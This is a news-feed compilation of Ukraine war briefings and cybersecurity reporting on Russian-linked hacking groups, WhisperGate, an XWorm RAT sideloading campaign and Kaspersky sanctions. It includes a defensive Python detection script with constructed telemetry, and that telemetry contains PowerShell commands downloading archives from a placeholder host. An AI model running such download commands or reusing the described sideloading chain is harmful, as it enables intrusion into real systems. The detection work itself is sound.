
Ukraine war briefing: multiple casualties in Russian attack on Dnipro apartment block

Infant among six injured, with at least one dead and more trapped in building in central Ukraine; 10 Ukrainian civilians freed from Russia and Belarus jails in Vatican-mediated deal. What we know on day 857

A Russian missile strike hit a nine-storey residential building in the central Ukrainian city of Dnipro on Friday, killing at least one person and injuring six others, officials said. The death toll would likely rise as more people remained trapped in the building, where four upper storeys collapsed as a result of the attack, said the interior minister, Ihor Klymenko. A photo posted on Telegram by the governor, Serhiy Lysak, and other images on social media showed a badly damaged building that had smoke rising from a gaping hole in its upper storeys. A seven-month-old infant was among the injured, Lysak said. Three people were in severe condition.

Volodymyr Zelenskiy said 10 civilians including a politician and two priests taken prisoner in Russia and Belarus had been freed in a deal mediated by the Vatican. Russia and Ukraine have exchanged hundreds of prisoners throughout their two-year conflict but the release of civilian prisoners is rarer. “We managed to return 10 more of our people from Russian captivity,” the Ukrainian president said on Telegram. It was not immediately clear if the release was part of an exchange deal involving Russian prisoners held in Ukraine. Some of those released had been in prison since 2017, he said, arrested in Russian-controlled parts of eastern Ukraine that at the time were run by Moscow-backed separatists.

Russia’s defence ministry claimed its forces had taken control of the settlement of Rozdolivka in eastern Ukraine, but the Ukrainian military said heavy fighting was raging in areas around the settlement. The Russian ministry said on Friday that Russia’s “southern” military grouping had taken up what it called more favourable positions after pushing Ukrainian forces out of the settlement. Rozdolivka is in the Donetsk region, the focal point of Russia’s slow advance across eastern Ukraine. It lies north of Bakhmut and Soledar, two localities brought under Russian control last year.

The Ukrainian military’s general staff said Russian forces had launched 19 attacks in a broad sector that included Rozdolivka. “Our soldiers resolutely held their defences and repelled 15 of the assaults,” the evening report on Friday said. “Four armed confrontations are continuing.” The battlefield accounts from either side could not be verified.

The Biden administration will provide Ukraine with $150m worth of weapons and ammunition, including Hawk air defence interceptors and 155mm artillery munitions, two US officials said. The weapons aid package was expected to be unveiled on Monday, they said on Friday, declining to be named. The administration is responding to Ukraine’s desperate requests for air defence support as Russia has pounded Ukrainian energy facilities in recent weeks via aerial attacks.

Vladimir Putin said Russia should start producing short- and intermediate-range missiles that were previously banned under a now-defunct arms treaty with the US. The Russian president was referring to missiles with a range of 500 to 5,500km (300-3,400 miles) that were banned under the cold war-era intermediate-range nuclear forces (INF) treaty. Washington withdrew from the deal in 2019, citing Russia’s failure to comply. The Kremlin said at the time that it would abide by a moratorium on production if the US did not deploy missiles within striking distance of Russia. In a televised address to his top security officials on Friday, Putin said the US had started using such missiles in training exercises in Denmark and “we need to react to this”.

Russia’s defence minister has ordered officials to prepare a “response” to US drone flights over the Black Sea, the ministry said, in an apparent warning that Moscow may take forceful action to ward off the American reconnaissance aircraft. The Russian defence ministry noted a recent “increased intensity” of US drones over the Black Sea, saying they “conduct intelligence and targeting for precision weapons supplied to the Ukrainian military by western countries for strikes on Russian facilities”.

The International Monetary Fund’s executive board has voted to approve a $2.2bn payout for Ukraine under an existing loan programme, and lowered its growth outlook following “devastating” Russian attacks against the country’s energy infrastructure. The much-needed funds would be used for “budget support” and bring the total amount disbursed under the 48-month loan agreement to about $7.6bn, the IMF said on Friday.


© Photograph: Mykola Synelnykov/Reuters


Kaja Kallas: the Russia-defying Estonian PM poised to lead EU foreign policy

Critics fear Kallas’s unyielding nature makes her the wrong fit to succeed Josep Borrell but allies admire her strength and clarity

Kaja Kallas will be giving up a lot to return to Europe to succeed Josep Borrell as the EU’s foreign policy chief.

Her 18th-century offices at the top of the picturesque old town in Tallinn marry elegance with efficiency, with the neoclassical cabinet chamber capable of projecting business papers on to the wall. Outside there is a balcony on the edge of Toompea hill where Kallas sometimes sits, with glorious views over the town and the Gulf of Finland.


© Photograph: Geert Vanden Wijngaert/AP


Astronauts take cover as defunct Russian satellite splits into nearly 200 pieces

The six US astronauts aboard the International Space Station rush to their spacecraft in case of emergency departure

A defunct Russian satellite has broken up into nearly 200 pieces of debris in orbit, forcing astronauts on the International Space Station to take shelter for about an hour and adding to the mass of space junk already in orbit, US space agencies said.

There were no immediate details on what caused the breakup of the Resurs-P1 Russian Earth observation satellite, which Russia declared dead in 2022.


© Photograph: Nasa/AP


Zelenskiy says Russia’s recent offensive shows pressure on Kremlin ‘not enough’

Ukrainian president signs military agreement with EU and says ‘fulfilment of every promise’ of support is important

Ukraine’s president, Volodymyr Zelenskiy, has told EU leaders that Russia’s spring offensive in Kharkiv showed that international pressure on the Kremlin was “not enough”, as he signed a military agreement with the bloc.

Vladimir Putin had tried to “expand the war” in May with a new offensive in eastern Ukraine, Zelenskiy said on Thursday, referring to relentless attacks on the Kharkiv region.


© Photograph: Olivier Hoslet/Reuters


AzzaSec, NoName Cyberattackers Join Hands to Potentially Target Pro-Ukraine Allies


Amid the ongoing Russo-Ukrainian war, hackers from Italy have decided to join forces with an infamous cyberattacker group in Russia. AzzaSec is an Italian hacktivist group that has been involved in anti-Israel campaigns and has teamed up with the infamous pro-Russian hacktivists NoName057(16). AzzaSec has a large network of partner groups, whereas NoName057(16) is selective in its allies. The alliance between these two nefarious groups signifies a potential increase in the scale and sophistication of cyberattacks on Ukraine and its allies.

Understanding the AzzaSec Ransomware

On June 26, 2024, NoName formally announced the alliance on its social media channels. “Today we have formed an alliance with the Italian hacker group AzzaSec, which is one of the TOP 3 coolest hack teams in Italy! We are always open to cooperation with various trance around the world!” the post read.

[Image: AzzaSec NoName alliance. Source: X]

AzzaSec is an infamous actor that infects computers, encrypts files and then demands a ransom for their decryption. Once a computer is infected, AzzaSec appends the '.AzzaSec' extension to filenames, changing '1.png' to '1.png.AzzaSec' and '2.pdf' to '2.pdf.AzzaSec'. It also changes the desktop wallpaper and presents a ransom note in a pop-up window like the screenshot below.

[Image: Azzasec ransomware. Source: X]

The group demands ransom in Bitcoin. AzzaSec’s sophisticated encryption techniques and the secrecy of cryptocurrency transactions make it increasingly difficult for authorities to crack down on the cybercriminals. AzzaSec recently announced the release of a Windows ransomware builder. The group claimed that its ransomware could bypass major antivirus solutions such as Windows 10 / 11 Defender, Avast, Kaspersky, and AVG. AzzaSec’s emergence on the ransomware scene is a reminder for organizations and individuals alike to upgrade their cybersecurity measures and remain vigilant against online threats.

Inglorious Past of NoName

NoName057(16), on the other hand, first emerged in March 2022 and is known for its cyberattacks on Ukrainian, American, and European government agencies, media, and private companies. The group is considered one of the biggest unorganised and free pro-Russian activist groups. Renowned for its widespread cyber operations, NoName057(16) has garnered notoriety for developing and distributing custom malware, notably the DDoS attack tool, the successor to the Bobik DDoS botnet.

[Image: AzzaSec NoName Russia. Source: X]

According to a report by Google-owned Mandiant, NoName057(16), along with other Russian state hackers, poses the biggest cyber threat to elections in regions with Russian interest. “Mandiant is tracking multiple self-proclaimed hacktivist groups primarily conducting DDoS attacks and leaking compromised data in support of Russian interests. These groups claim to have targeted organizations spanning the government, financial services, telecommunications, transportation, and energy sectors in Europe, North America, and Asia; however, target selection and messaging suggests that the activity is primarily focused on the conflict in Ukraine. Relevant groups include KillNet, Anonymous Sudan, NoName057(16), JokerDNR/DPR, Beregini, FRwL_Team (aka "From Russia with Love"), and Moldova Leaks,” Google stated in its threat intelligence report in April.

The alliance between AzzaSec and NoName057(16) raises serious concerns about the evolving cyber threat landscape. With a combined skillset for ransomware deployment and large-scale attacks, these groups pose a significant risk to organizations and governments aligned with Ukraine. As the Russo-Ukrainian war rages on, the digital front is likely to see further escalation in cyberattacks. It is crucial for targeted nations and organizations to bolster their cybersecurity defenses, implement robust incident response plans, and collaborate on international efforts to counter these cyber threats.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Ukraine war briefing: US charges Russian with conspiring to destroy Kyiv computer systems

Justice department announces $10m reward for information on 22-year-old Amin Timovich Stigal, who remains at large. What we know on day 855

A Russian has been charged with conspiring to hack and destroy computer systems and data in Ukraine and allied countries including the US, the US justice department said on Wednesday, and announced a $10m reward for information. Before the invasion of Ukraine in February 2022, Amin Timovich Stigal, 22, who remains at large, targeted Kyiv’s government systems and data with no military-related role, the department alleged. Computer systems in the US and other countries that provided support to Ukraine were targeted later, it alleged.

Wall Street Journal reporter Evan Gershkovich went on trial behind closed doors in Ekaterinburg on Wednesday, 15 months after his arrest in the Russian city on espionage charges that he, his employer and the US government vehemently deny. The 32-year-old was arrested in March 2023, while on a reporting trip to Ekaterinburg, in the Ural Mountains, with authorities claiming without offering any evidence that he was gathering secret information for the US.

The EU is expected to sign a security agreement with Ukrainian President Volodymyr Zelenskiy on Thursday, pledging to keep delivering weapons, military training and other aid to Kyiv for years to come. The agreement will lay out the EU’s commitment to help Ukraine in nine areas of security and defence policy – including arms deliveries, military training, defence industry cooperation and demining, according to a draft seen by Reuters.

European Union countries agreed a sanctions package against Belarus on Wednesday, EU diplomats and Belgium said, to try to close off a route to avoiding restrictions on Russia. “This package will strengthen our measures in response to Russia’s invasion of Ukraine, including combating circumvention of sanctions,” Belgium, which holds the EU presidency until the end of June, said on X.

President Volodymyr Zelenskiy made an unannounced visit to the Donetsk region in eastern Ukraine to bolster morale among troops, amid continuing advances by Russian forces. The Ukrainian president recorded a video address against the backdrop of Pokrovsk, a city with a prewar population of about 61,000 that has experienced some of the most intense fighting during the 28-month-long full-scale invasion. Zelenskiy made the trip alongside Brig Gen Andriy Hnatov, the newly appointed commander of the joint forces.

During the visit, Zelenskiy signalled that he was getting tough on officials he suspects are shirking their duties. He said that back in Kyiv he would speak to “officials who must be here and in other areas near the frontline – in difficult communities where people need immediate solutions.” He continued: “I was surprised to learn that some relevant officials have not been here for six months or more. There will be a serious conversation, and I will draw appropriate conclusions regarding them.”

Five Lithuanians were wounded when they came under fire in eastern Ukraine as they delivered aid to troops, officials and team members said Wednesday. The volunteer workers were in a car that was shelled on Monday in Pokrovsk in Ukraine’s Donetsk region, a colleague Valdas Bartkevicius told AFP. The region’s governor reported that five people were killed and dozens wounded in Russian strikes on Pokrovsk on Monday.

Representatives of Russia’s and Ukraine’s human rights offices held a meeting for the first time during an exchange of prisoners of war on Tuesday, Kyiv said. The two countries each released 90 captured soldiers in a deal brokered by the United Arab Emirates, the latest in more than 50 prisoner exchanges that have taken place throughout the war. But it was the first time Russia had agreed to hold a direct meeting between human rights representatives during the exchange, Ukraine’s human rights commissioner Dmytro Lubinets told AFP.

Nato’s 32 nations on Wednesday appointed outgoing Dutch prime minister Mark Rutte as the alliance’s next head. Rutte will take over from secretary general Jens Stoltenberg on 1 October after major powers – spearheaded by the US – wrapped up his nomination ahead of a summit of Nato leaders in Washington next month.


© Photograph: Anadolu Agency/Getty Images


Russian Man Indicted for Cyberattacks Targeting Ukraine with WhisperGate Malware Ahead of 2022 Invasion


A U.S. grand jury has indicted a Russian citizen, Amin Timovich Stigal, for allegedly conspiring with Russia's military intelligence agency (GRU) to launch cyberattacks crippling Ukrainian government systems and data ahead of Russia's full-scale invasion in February 2022.

The indictment, unsealed yesterday in Maryland, sheds light on a coordinated effort to disrupt critical Ukrainian infrastructure and sow panic among the population.

“As alleged, the defendant conspired with Russian military intelligence on the eve of Russia’s unjust and unprovoked invasion of Ukraine to launch cyberattacks targeting the Ukrainian government and later targeting its allies, including the United States.” - Attorney General Merrick B. Garland

Attacker Aimed for 'Complete Destruction' in Cyberattacks Targeting Ukraine

Stigal, 22, who remains at large, was charged for his alleged role in using a deceptive malware strain called "WhisperGate" to infiltrate dozens of Ukrainian government networks, including ministries, state services, and critical infrastructure entities. Disguised as ransomware, WhisperGate reportedly went beyond data encryption, aiming for complete destruction of targeted systems and data.

The attacks coincided with the defacement of Ukrainian websites displaying threatening messages designed to intimidate the public. Sensitive data, including patient health records, was exfiltrated and offered for sale online, further amplifying the chaos.

U.S. Critical Infrastructure Targeted Too

But the malicious campaign wasn't limited to cyberattacks targeting Ukraine. The indictment broadens the scope beyond Ukraine, revealing attempts to probe U.S. government networks in Maryland using similar tactics.

“These GRU actors are known to have targeted U.S. critical infrastructure. During these malicious cyber activities, GRU actors launched efforts to scan for vulnerabilities, map networks, and identify potential website vulnerabilities in U.S.-based critical infrastructure – particularly the energy, government, and aerospace sectors.” - Rewards for Justice

The scope of the malicious campaign highlights the potential wide-ranging objectives of the GRU cyber campaign and the ongoing threat posed by nation-state actors.

Reward Offered for Info Leading to Capture

The Justice Department emphasized its commitment to holding accountable those responsible for Russia's malicious cyber activity. The indictment carries a maximum sentence of five years, but international cooperation remains crucial to apprehend Stigal.

The U.S. Department of State's Rewards for Justice program is offering a significant reward – up to $10 million – for information leading to Stigal's capture or the disruption of his cyber operations. This substantial reward underscores the seriousness of the charges and the international effort to dismantle Russia's cyber warfare apparatus.

This case serves as a stark reminder of the evolving cyber threat landscape. The destructive capabilities of malware like WhisperGate, coupled with the targeting of critical infrastructure, necessitate vigilance and collaboration between governments and security professionals to defend against nation-state cyberattacks.

“Malicious cyber actors who attack our allies should know that we will pursue them to the full extent of the law,” said Erek L. Barron, U.S. Attorney for the District of Maryland. “Cyber intrusion schemes such as the one alleged threaten our national security, and we will use all the technologies and investigative measures at our disposal to disrupt and track down these cybercriminals.”

Who is Amin Stigal?

The U.S. linked 22-year-old Amin Stigal to the Russian GRU and named him for his involvement in the WhisperGate malware operations. But who is Amin Stigal and what is the extent of his involvement?

[Image: Amin Stigal. Source: Rewards for Justice]

The U.S. authorities, along with the $10 million bounty, released scarce but very important details on Stigal's cyber trail: his aliases, or the threat group names with which he is affiliated. The Cyber Express did an open-source intelligence (OSINT) study on these aliases and found the following details on Amin Stigal's cyber activities:

DEV-0586/Cadet Blizzard

Microsoft first tracked this threat actor as DEV-0586 and observed its destructive malware targeting Ukrainian organizations in January 2022. The tech giant later in April 2023 shifted to a new threat actor-naming taxonomy and thus named the TA "Cadet Blizzard." Cadet Blizzard has been operational since at least 2020 and has initiated a wave of destructive wiper attacks against Ukraine in the lead up to Russia's February 2022 invasion of Ukraine. Specifically, it created and developed WhisperGate, a wiper that deletes the master boot record, Microsoft said.

EMBER BEAR

CrowdStrike tracked this threat actor as EMBER BEAR (aka Lorec Bear, Bleeding Bear, Saint Bear) and linked it to an adversary group that has operated against government and military organizations in eastern Europe since early 2021. The likely motive of this TA is to collect intelligence from target networks, the cybersecurity firm said. EMBER BEAR primarily weaponized the access and data obtained during its intrusions to support information operations (IO), according to CrowdStrike. Its aim in employing this tactic was to create public mistrust in targeted institutions and degrade the respective governments' ability to counter Russian cyber operations.

UAC-0056

The Computer Emergency Response Team of Ukraine tracked this Russian-linked threat actor/group as UAC-0056 and observed its malicious campaigns targeting Ukraine through phishing campaigns in July 2022. In the discovered attack, threat actors sought to disrupt the integrity and availability of government websites by exploiting several backdoors and deploying Cobalt Strike Beacon malware. The threat actors communicated with the web shell using IP addresses, including those belonging to neighboring devices of other hacked organizations due to their previous account abuse and additional VPN connection to the corresponding organizations. The hackers also applied other malware samples in this campaign including the GOST (Go Simple Tunnel) and Ngrok utilities, to deploy the HoaxPen backdoor.

What is WhisperGate Malware?

WhisperGate is destructive malware that is designed to look like ransomware but is not. Unlike ransomware, which encrypts data and demands a ransom for decryption, WhisperGate aimed to completely destroy data, rendering the infected systems inoperable. It first targeted Ukrainian organizations in January 2022 and has since remained on the list of top malware variants used to target Kyiv.

Key Points on WhisperGate:

  • Multi-stage Attack: It operated in stages, with the first stage overwriting the Master Boot Record (MBR) to prevent the system from booting normally and displaying a fake ransom note.
  • Data Wiping: The MBR overwrite made data recovery nearly impossible.
  • Motive: Experts believe the goal was data destruction, not financial gain, due to the lack of a real decryption method.
  • Deployment: The malware resided in common directories like C:\PerfLogs and used a publicly available tool called Impacket to spread laterally within networks.

Russian Hackers Target Ukraine with XWorm RAT Malware Payload


Cyble Research and Intelligence Labs (CRIL) researchers have observed the Russia-linked threat actor group UAC-0184 targeting Ukraine with the XWorm remote access trojan (RAT) through the use of Python-related files.

Technical Overview of XWorm RAT Campaign

The campaign begins with a malicious LNK shortcut file, disguised as a legitimate Excel document, which runs a PowerShell script when executed. The script downloads two files, "pkg.zip" and "NewCopy.xlsx", from a specified URL. The LNK shortcut file then executes "pythonw.exe" using the start command, which duplicates files and stores them in a new folder. The "pythonw.exe" process loads a malicious DLL, "python310.dll", through DLL sideloading, injecting shellcode into the MSBuild process.

[Image: Russia Ukraine XWorm Malware. Source: Cyble]

The hackers use a technique called DLL sideloading, where a malicious library file masquerades as a legitimate one. This allows the attackers to run their code under the guise of trusted software. Additionally, they employ a tool called Shadowloader to inject the XWorm RAT into a running process, further obscuring its presence. The XWorm RAT is then executed, offering a range of capabilities, including data theft, DDoS attacks, and cryptocurrency address manipulation. The malware attempts to connect to a Command-and-Control (C&C) server, but at the time of analysis, the server was inactive, resulting in no observed malicious activities.

[Image: XWorm Malware Excel. Source: Cyble]

While the initial infection vector remains unclear, researchers suspect phishing emails may play a role. The intended victim could not be ascertained from the Excel lure used in the campaign. CRIL researchers had previously observed the UAC-0184 threat actor group employing lures tailored to appeal to Ukrainian targets, often mimicking official government or utility communications.

Protecting Against XWorm RAT

The XWorm RAT malware employed in the campaign is designed to be easily accessible even to threat actors lacking sophistication and technical expertise. The versatile malware offers several functionalities, including data theft, DDoS attacks, cryptocurrency address manipulation, ransomware deployment, and downloading additional malware onto compromised systems. Cyble researchers have recommended several measures to defend against this campaign:
  • Implement strong email filtering to block malicious attachments.
  • Exercise caution with email attachments, especially from unknown senders.
  • Limit execution of scripting languages where possible.
  • Use application whitelisting to control which programs can run.
  • Deploy robust antivirus and anti-malware solutions.
  • Enforce strong, unique passwords and two-factor authentication.
  • Monitor networks for unusual activity or data exfiltration attempts.
The campaign demonstrates UAC-0184's relentless efforts at attacking Ukraine with evasive techniques. The use of the XWorm RAT as the final payload indicates the intent to establish remote access over compromised systems for strategic purposes.
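One way to monitor for the chain described in the technical overview, as an added example that is not from Cyble or The Cyber Express: it correlates Sysmon-style process-create (1), image-load (7) and remote-thread (8) events per host and alerts when an unsigned "python310.dll" loaded by "pythonw.exe" coincides with other stages. The host names, paths, 10-minute window, known-good install root and the way the MSBuild step surfaces in telemetry are assumptions, and every sample event is constructed.

```python
"""Correlate Sysmon-style events for the LNK -> PowerShell -> pythonw.exe
sideloading chain described above. All sample events are constructed."""
from datetime import datetime, timedelta
from ntpath import basename  # Windows path semantics on any OS

WINDOW = timedelta(minutes=10)  # assumed correlation window
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")
# Default per-user python.org install root, treated as expected (assumption).
KNOWN_GOOD = ("\\appdata\\local\\programs\\python\\",)


def in_user_dir(path):
    p = path.lower()
    if any(good in p for good in KNOWN_GOOD):
        return False
    return any(marker in p for marker in USER_WRITABLE)


def name(ev, field):
    return basename(ev.get(field, "")).lower()


def classify(ev):
    """Map one event to a stage of the chain, or None if it is unrelated."""
    eid = ev["EventID"]
    if eid == 1:  # process creation
        cmd = ev.get("CommandLine", "").lower()
        if name(ev, "Image") == "powershell.exe" and "http" in cmd and ".zip" in cmd:
            return "ps_download"
        if name(ev, "Image") == "pythonw.exe" and in_user_dir(ev["Image"]):
            return "python_from_user_dir"
        if name(ev, "Image") == "msbuild.exe" and name(ev, "ParentImage") == "pythonw.exe":
            return "msbuild_from_python"
    elif eid == 7:  # image load: the sideloading step itself
        if (name(ev, "Image") == "pythonw.exe"
                and name(ev, "ImageLoaded") == "python310.dll"
                and ev.get("SignatureStatus") != "Valid"):
            return "unsigned_python_dll"
    elif eid == 8:  # CreateRemoteThread
        if name(ev, "SourceImage") == "pythonw.exe" and name(ev, "TargetImage") == "msbuild.exe":
            return "msbuild_from_python"
    return None


def correlate(events):
    """Alert per host when the sideload stage has company inside WINDOW."""
    hits = {}
    for ev in events:
        stage = classify(ev)
        if stage:
            ts = datetime.fromisoformat(ev["UtcTime"])
            hits.setdefault(ev["Host"], []).append((ts, stage))
    alerts = []
    for host, staged in sorted(hits.items()):
        anchors = [ts for ts, s in staged if s == "unsigned_python_dll"]
        for anchor in anchors[:1]:  # one alert per host is enough for triage
            stages = sorted({s for ts, s in staged if abs(ts - anchor) <= WINDOW})
            if len(stages) >= 2:
                alerts.append({"host": host, "time": anchor.isoformat(), "stages": stages})
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSB = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
BAD = r"C:\Users\u1\AppData\Roaming\pkg"                       # constructed
GOOD = r"C:\Users\dev\AppData\Local\Programs\Python\Python310"  # constructed

SAMPLE_EVENTS = [  # constructed telemetry, not captured from a real host
    {"Host": "WS-01", "EventID": 1, "UtcTime": "2024-06-25T09:00:05", "Image": PS,
     "CommandLine": "powershell Invoke-WebRequest http://example.invalid/pkg.zip -OutFile pkg.zip"},
    {"Host": "WS-01", "EventID": 1, "UtcTime": "2024-06-25T09:00:40",
     "Image": BAD + r"\pythonw.exe", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Host": "WS-01", "EventID": 7, "UtcTime": "2024-06-25T09:00:41",
     "Image": BAD + r"\pythonw.exe", "ImageLoaded": BAD + r"\python310.dll",
     "SignatureStatus": "Unavailable"},
    {"Host": "WS-01", "EventID": 8, "UtcTime": "2024-06-25T09:00:50",
     "SourceImage": BAD + r"\pythonw.exe", "TargetImage": MSB},
    # Developer workstation: signed per-user Python and an IDE-driven build.
    {"Host": "DEV-02", "EventID": 1, "UtcTime": "2024-06-25T09:10:00",
     "Image": GOOD + r"\pythonw.exe", "ParentImage": r"C:\Windows\explorer.exe"},
    {"Host": "DEV-02", "EventID": 7, "UtcTime": "2024-06-25T09:10:01",
     "Image": GOOD + r"\pythonw.exe", "ImageLoaded": GOOD + r"\python310.dll",
     "SignatureStatus": "Valid"},
    {"Host": "DEV-02", "EventID": 1, "UtcTime": "2024-06-25T09:12:00", "Image": MSB,
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\devenv.exe"},
    # A lone archive download is recorded as a stage but does not alert.
    {"Host": "WS-03", "EventID": 1, "UtcTime": "2024-06-25T10:00:00", "Image": PS,
     "CommandLine": "powershell Invoke-WebRequest https://example.invalid/tools.zip"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Anchoring on the image-load signature rather than on the interpreter's location keeps per-user Python installs and IDE-driven MSBuild runs from alerting.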

After Banning Sales of Kaspersky Products, U.S. Sanctions its Top Executives


A day after the Biden administration announced a U.S. ban on the sale of Kaspersky Lab products, the U.S. Treasury Department on Friday sanctioned a dozen top executives and senior leaders at the Russian cybersecurity company. Kaspersky took issue with the Biden administration's moves and said, "The decision does not affect the company’s ability to sell and promote cyber threat intelligence offerings and/or trainings in the U.S." The company said the action will instead benefit cybercriminals by restricting international cooperation between cybersecurity experts. The decision to ban Kaspersky is "based on the present geopolitical climate and theoretical concerns," the company said in a scathing response to the Commerce Department's ban. The sanctions represent the latest in a series of punitive measures against the Russian antivirus company, underscoring growing concerns about cybersecurity and national security risks associated with the firm's operations.

Details of the Kaspersky Sanctions

The Treasury Department’s Office of Foreign Assets Control (OFAC) specifically targeted key individuals within Kaspersky Lab, including the chief operating officer, chief legal officer, chief of human resources, and chief business development and technology officers, among others.

[Image: Kaspersky top executives sanctioned. Source: U.S. Department of the Treasury]

The Treasury added all the above individuals to its Specially Designated Nationals list. SDN is a list maintained by OFAC that publicly identifies persons determined by the U.S. government to be involved in activities that threaten or undermine U.S. foreign policy or national security objectives. Notably, the sanctions did not extend to Kaspersky Lab itself, its parent or subsidiary companies, or its CEO Eugene Kaspersky.

The sanctions came just a day after the U.S. Commerce Department issued a final determination to ban Kaspersky Lab from operating in the United States. This ban is rooted in longstanding concerns over national security and the potential risks to critical infrastructure. The Commerce Department also added three Kaspersky divisions to its entity list due to their cooperation with the Russian government in cyber intelligence activities.

The U.S. government has been wary of Kaspersky Lab's ties to the Russian government, fearing that its software could be used to facilitate cyber espionage. Bloomberg in 2017 first reported it had seen emails between chief executive Eugene Kaspersky and senior Kaspersky staff outlining a secret cybersecurity project apparently requested by the Russian intelligence service FSB. Kaspersky refuted these claims, calling the allegations "false" and "inaccurate." However, these concerns have led to a broader push to restrict the company's operations within the U.S. and to mitigate any potential threats to national security.

Kaspersky Lab’s Response

Kaspersky Lab has consistently denied any allegations of being influenced or controlled by any government. The company has pledged to explore all legal options in response to the Commerce Department’s ban and the recent sanctions imposed by the Treasury. In a statement, Kaspersky Lab reiterated its commitment to transparency and maintaining the trust of its users worldwide, emphasizing it has never assisted any government in cyber espionage activities. "Kaspersky does not engage in activities which threaten U.S. national security and, in fact, has made significant contributions with its reporting and protection from a variety of threat actors that targeted U.S. interests and allies," it said.
"Kaspersky provides industry-leading products and services to customers around the world to protect them from all types of cyber threats, and has repeatedly demonstrated its independence from any government." - Kaspersky Lab
The antivirus company claimed it has also implemented significant transparency measures that demonstrate its commitment to integrity and trustworthiness. But "the Department of Commerce’s decision unfairly ignores the evidence," Kaspersky said. The company said it also proposed a system in which the security of Kaspersky products could have been independently verified by a trusted third party.
"Kaspersky believes that the Department of Commerce made its decision based on the present geopolitical climate and theoretical concerns, rather than on a comprehensive evaluation of the integrity of Kaspersky’s products and services."
However, Brian Nelson, Treasury’s Undersecretary for Terrorism and Financial Intelligence, stated, “Today’s action against the leadership of Kaspersky Lab underscores our commitment to ensure the integrity of our cyber domain and to protect our citizens against malicious cyber threats. The U.S. will take action where necessary to hold accountable those who would seek to facilitate or otherwise enable these activities.”

Implications and Future Actions

The sanctions against Kaspersky Lab’s leadership signal a broader strategy by the U.S. government to address cybersecurity threats posed by foreign entities. This approach is part of a larger effort to strengthen national security and protect critical infrastructure from potential cyberattacks.

Legal and Business Repercussions

Kaspersky Lab’s legal battles and its efforts to counteract these sanctions will be closely watched. The company's ability to operate in the international market could be significantly affected by these measures, impacting its business operations and customer trust.

Global Cybersecurity Landscape

This development also highlights the ongoing tensions in the global cybersecurity landscape, where national security concerns often intersect with business interests. The actions taken by the U.S. government may set a precedent for how other nations address similar concerns with foreign technology firms. The U.S. Treasury Department's decision to sanction senior leaders at Kaspersky Lab marks a pivotal moment in the ongoing scrutiny of the Russian cybersecurity firm. While Kaspersky Lab denies any wrongdoing and prepares to contest the sanctions legally, the actions taken by the U.S. government underscore a determined effort to mitigate potential cyber threats and protect national security. As the situation unfolds, it will have significant implications for both Kaspersky and the broader cybersecurity environment.

Everything we have is going to go to Ukraine until their needs are met.

A round-up of links inside on the Russia-Ukraine war. Today is day 848 of the invasion.

Russia: Russia wages a scorched-earth war in Ukraine with retrofitted bombs and new airstrips (AP) Fire at drone-hit Russian oil depot rages for second day (Reuters) Putin accuses NATO of creating a security threat for Russia in Asia (Reuters)
China: Outgoing NATO chief says China should face consequences for backing Russia's war on Ukraine (CBC) Ukraine peace summit is a 'success', China key to ending war: ambassador to Singapore (South China Morning Post) China lobbying for its alternative peace plan ahead of Ukraine's summit, Reuters reports (Kyiv Independent)
EU: EU passes 14th sanctions package in first major move against Russian gas (Kyiv Independent) Romania to send Patriot defense system to Ukraine (Kyiv Independent) EU envoys agree on more Russia sanctions. LNG imports are among the targets. (AP)
Japan: Signing of the Accord on Support for Ukraine and Cooperation between the Government of Japan and Ukraine (Ministry of Foreign Affairs of Japan) Japan to finance US$188 million technology transfer to Ukrainian business (MSN)
North & South Korea: Russia and North Korea sign mutual defence pact: Vladimir Putin and Kim Jong-un's agreement raises western alarm about possible Russian help for nuclear programme (Guardian) What's known, and not known, about the partnership agreement signed by Russia and North Korea (AP) Putin says South Korea would be making 'a big mistake' if it supplies arms to Ukraine (Reuters)
Ukraine: Russian troops fail to advance as Ukraine garners military, financial aid (Al Jazeera) Ukraine, Russia targeting each other's energy infrastructure (NHK World Japan) Ukraine launches a national sexual assault registry for victims of Russian forces (CTV)
USA: US to focus on deepening ties with Vietnam after Putin's Hanoi visit (Reuters) Exclusive: Biden to ban US sales of Kaspersky software over Russia ties, source says (Reuters) White House confirms Ukraine to get priority on air defense missile deliveries (Kyiv Independent; post title is a Biden quote from this article)
Aid: Fidelity Charitable list of organizations; UNICEF; Support Sellers in Ukraine

Ukraine Detains Suspects Behind Bot Farms and Kremlin’s Propaganda Machinery

Ukraine’s Security Service (SBU) detained two individuals accused of aiding Russian intelligence in hacking the phones of Ukrainian soldiers and spreading pro-Kremlin propaganda. The suspects operated bot farms using servers and SIM cards to create fake social media accounts. One bot farm in the Zhytomyr Oblast was hosted in an apartment of a Ukrainian woman. She allegedly registered over 600 virtual mobile numbers and several anonymous Telegram accounts.

Russian Intelligence Installed Spyware in Campaign

The woman sold or rented these accounts in exchange for cryptocurrency on online Russian underground marketplaces. Russian intelligence used these accounts and numbers to hack phones of Ukrainian military personnel by sending phishing emails containing spyware that collected sensitive confidential data. Russian hackers were recently observed using legitimate remote monitoring and management (RMM) software to spy on Ukraine and its allies.

Image: Bot Farms (Source: SBU)

According to the SBU, the accounts hosted on this bot farm were also used to spread pro-Kremlin propaganda while posing as ordinary Ukrainian citizens. Another 30-year-old man from Dnipro allegedly registered nearly 15,000 fake accounts on various social networks and messaging platforms using Ukrainian SIM cards. He sold these accounts to Russian intelligence services on darknet forums.

Image: Bot Farms (Source: SBU)

Both suspects face up to three years in prison or a fine if found guilty. The investigation continues.

Russian Bot Farms Used Since Invasion Started

